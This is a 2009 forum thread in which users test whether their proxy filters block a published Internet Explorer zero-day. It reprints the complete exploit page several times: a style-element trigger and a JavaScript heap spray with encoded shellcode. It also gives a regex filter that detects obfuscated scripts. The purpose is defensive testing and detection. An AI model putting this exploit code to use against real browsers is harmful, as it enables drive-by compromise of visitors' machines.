Post Reply 
Zero-Day Internet Explorer Exploit Published
Nov. 22, 2009, 01:08 PM
Post: #1
Zero-Day Internet Explorer Exploit Published
Does sidki's filter set set protect against this?

http://www.symantec.com/connect/blogs/ze...-published

Quote:A new exploit targeting Internet Explorer was published to the BugTraq mailing list yesterday. Symantec has conducted further tests and confirmed that it affects Internet Explorer versions 6 and 7 as well. The exploit currently exhibits signs of poor reliability, but we expect that a fully-functional reliable exploit will be available in the near future. When this happens, attackers will have the ability to insert the exploit into Web sites, infecting potential visitors. For an attacker to launch a successful attack, they must lure victims to their malicious Web page or a Web site they have compromised. In both cases, the attack requires JavaScript to exploit Internet Explorer.

Here is the code from BugTraq:
Code:
<!--
securitylab.ir
K4mr4n_st (at) yahoo (dot) com [email concealed]
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<script>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>

<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>

</HEAD>
<BODY onload="load()">
</BODY>
</HTML>

Thanks in advance.
Add Thank You Quote this message in a reply
Nov. 22, 2009, 02:13 PM
Post: #2
RE: Zero-Day Internet Explorer Exploit Published
I saved the code you posted as an *.html page and ran it on one of my Apache servers.

My anti-virus effectively stops it (while trying to save the code to an html page and when loading the page in a browser), but the latest Sidki out-of-the-box does not block it.

I tried enabling a few non-default web filters to see if they would stop it, but the only one that I found effective was the Header Filter, "! |||||||||||| 7.1 Block all Scripts 07.03.20 [sd] (o.3) (Out)".

Here's an excerpt of the debug output with stock settings using the latest beta:

Code:
<script>
function load(){
var e;
e=document
<Match: Block/Modify: Sel. JS Properties     07.04.02 [sd] (d.2) >
.getElementsByTagName("STYLE")[0
</Match>
.getElementsByTagName("STYLE")[0+1];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>

<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>


<Match: Header Bot Mark: Start - Fix </head>     09.06.29 (multi) [sd] (d.r) >
</HEAD>
</Match>

And here's the same excerpt with the aforementioned Header Filter activated:

Code:
<Match: <script> Block: All Scripts     08.11.18 (cch!) [srl] (d.0) >
<script>
</Match>
<script type=text/javascript src=data:text/javascript,var%20prxCountAd=++prxCountAd||1;>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>


<Match: <script> Block: All Scripts     08.11.18 (cch!) [srl] (d.0) >
<SCRIPT language="javascript">
</Match>
<script type="text/javascript" src="data:text/javascript,var%20prxCountAd=++prxCountAd||1;">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>


<Match: Header Bot Mark: Start - Fix </head>     09.06.29 (multi) [sd] (d.r) >
</HEAD>
</Match>

This was a quick-and-dirty test, so my analysis is subject to being ripped apart. Smile!
Add Thank You Quote this message in a reply
Nov. 22, 2009, 02:32 PM
Post: #3
RE: Zero-Day Internet Explorer Exploit Published
Thanks for testing this, ProxoDent!

Now that I think of it, I have a filter which does the job nicely:
Code:
Name = "<script>: Remove Obfuscated Code"
Active = TRUE
URL = "($TYPE(htm)|$TYPE(js)|$TYPE(vbs))"
Bounds = "$NEST(<script,</script*>)"
Limit = 32767
Match = "*(\\([0-7]+{1,3}&&[#000:377])"
        "|(%|\\x)([a-f0-9])+{2}"
        "|(%|\\)u([a-f0-9])+{4}"
        "|\@([0-9])+{4,12}"
        ")+{5,*}*"
Replace = "<!-- PROX: Obfuscated Script removed -->$SET(script=)"

This is a modified version of a filter which was discussed in 2008, I believe.
Add Thank You Quote this message in a reply
Nov. 22, 2009, 02:41 PM
Post: #4
RE: Zero-Day Internet Explorer Exploit Published
(Nov. 22, 2009 02:32 PM)DarthTrader Wrote:  Thanks for testing this, ProxoDent!

Now that I think of it, I have a filter which does the job nicely:

Yes. That does it:

Code:
<script>
function load(){
var e;
e=document
<Match: Block/Modify: Sel. JS Properties     07.04.02 [sd] (d.2) >
.getElementsByTagName("STYLE")[0
</Match>
.getElementsByTagName("STYLE")[0+1];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>


<Match: <script>: Remove Obfuscated Code >
<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>
</Match>
<!-- PROX: Obfuscated Script removed -->


<Match: Header Bot Mark: Start - Fix </head>     09.06.29 (multi) [sd] (d.r) >
</HEAD>
</Match>
Add Thank You Quote this message in a reply
Nov. 22, 2009, 09:41 PM
Post: #5
RE: Zero-Day Internet Explorer Exploit Published
Yes don't use Infected Explorer Smile!
Add Thank You Quote this message in a reply
Nov. 22, 2009, 10:12 PM
Post: #6
RE: Zero-Day Internet Explorer Exploit Published
(Nov. 22, 2009 02:32 PM)DarthTrader Wrote:  Thanks for testing this, ProxoDent!

Now that I think of it, I have a filter which does the job nicely:
Code:
Name = "<script>: Remove Obfuscated Code"
Active = TRUE
URL = "($TYPE(htm)|$TYPE(js)|$TYPE(vbs))"
Bounds = "$NEST(<script,</script*>)"
Limit = 32767
Match = "*(\\([0-7]+{1,3}&&[#000:377])"
        "|(%|\\x)([a-f0-9])+{2}"
        "|(%|\\)u([a-f0-9])+{4}"
        "|\@([0-9])+{4,12}"
        ")+{5,*}*"
Replace = "<!-- PROX: Obfuscated Script removed -->$SET(script=)"

This is a modified version of a filter which was discussed in 2008, I believe.

Unfortunatelly, this filter also breaks a lot of others, for example :
http://www.youtube.com/watch?v=bU7j97ZIGdQ
Add Thank You Quote this message in a reply
Nov. 22, 2009, 11:32 PM
Post: #7
RE: Zero-Day Internet Explorer Exploit Published
Changing this:
Code:
"|(%|\\x)([a-f0-9])+{2}"
to this:
Code:
"|(%|\\x)([a-f0-9])+{4}"
seems to help.

Thanks for the heads up!
Add Thank You Quote this message in a reply
Post Reply 


Forum Jump: